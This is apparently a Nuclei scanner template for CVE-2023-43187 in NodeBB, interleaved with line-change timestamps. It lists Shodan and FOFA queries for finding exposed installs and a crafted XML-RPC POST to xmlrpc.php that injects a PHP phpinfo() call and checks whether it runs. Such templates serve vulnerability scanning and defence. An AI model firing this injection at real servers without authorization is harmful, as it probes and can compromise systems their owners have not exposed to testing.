2024-03-06 18:03:53 +00:00
id : CVE-2023-43187
info :
2024-03-06 18:20:05 +00:00
name : NodeBB XML-RPC Request xmlrpc.php - XML Injection
author : 0xParth
2024-03-06 18:03:53 +00:00
severity : critical
2024-03-06 18:20:05 +00:00
description : |
A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.
reference :
2024-03-06 18:20:54 +00:00
- https://github.com/jagat-singh-chaudhary/CVE/blob/main/CVE-2023-43187
- https://nvd.nist.gov/vuln/detail/CVE-2023-43187
2024-03-06 18:03:53 +00:00
classification :
2024-03-06 18:20:05 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2024-03-06 18:03:53 +00:00
cvss-score : 9.8
2024-03-06 18:20:05 +00:00
cve-id : CVE-2023-43187
cwe-id : CWE-91
2024-05-31 19:23:20 +00:00
epss-score : 0.2535
epss-percentile : 0.96685
2024-03-06 18:20:05 +00:00
cpe : cpe:2.3:a:nodebb:nodebb:*:*:*:*:*:*:*:*
metadata :
2024-03-23 09:28:19 +00:00
max-request : 2
2024-03-06 18:20:05 +00:00
vendor : nodebb
product : nodebb
2024-05-31 19:23:20 +00:00
shodan-query : cpe:"cpe:2.3:a:nodebb:nodebb"
2024-03-23 09:28:19 +00:00
fofa-query : "title=\"nodebb\""
2024-03-06 18:20:05 +00:00
tags : cve,cve2023,nodebb,rce
2024-03-08 11:02:47 +00:00
flow : http(1) && http(2)
2024-03-06 18:20:05 +00:00
http :
2024-03-08 11:02:47 +00:00
- method : GET
path :
- "{{BaseURL}}"
matchers :
- type : dsl
internal : true
dsl :
- contains(to_lower(body), "nodebb")
2024-03-06 18:03:53 +00:00
- method : POST
path :
- "{{BaseURL}}/xmlrpc.php"
headers :
Content-Type : "text/xml"
body : |
<?xml version="1.0"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params>
<param>
<value><?php phpinfo(); ?></value>
</param>
</params>
</methodCall>
matchers-condition : and
matchers :
- type : word
2024-03-06 18:20:05 +00:00
part : body
2024-03-06 18:03:53 +00:00
words :
- "<title>phpinfo()</title>"
- "PHP Version"
condition : or
- type : status
status :
- 200
2024-06-01 06:53:00 +00:00
# digest: 490a0046304402206f73e8bfe9f915a5f04e492f88298ddf9c08f2c4fba07b868c0fefcc55b5585e02205b4976d241ea3d57d596f3af37f9478a17a66b28bf536fe9d09ab098811bbb99:922c64590222798bb761d5b6d8e72950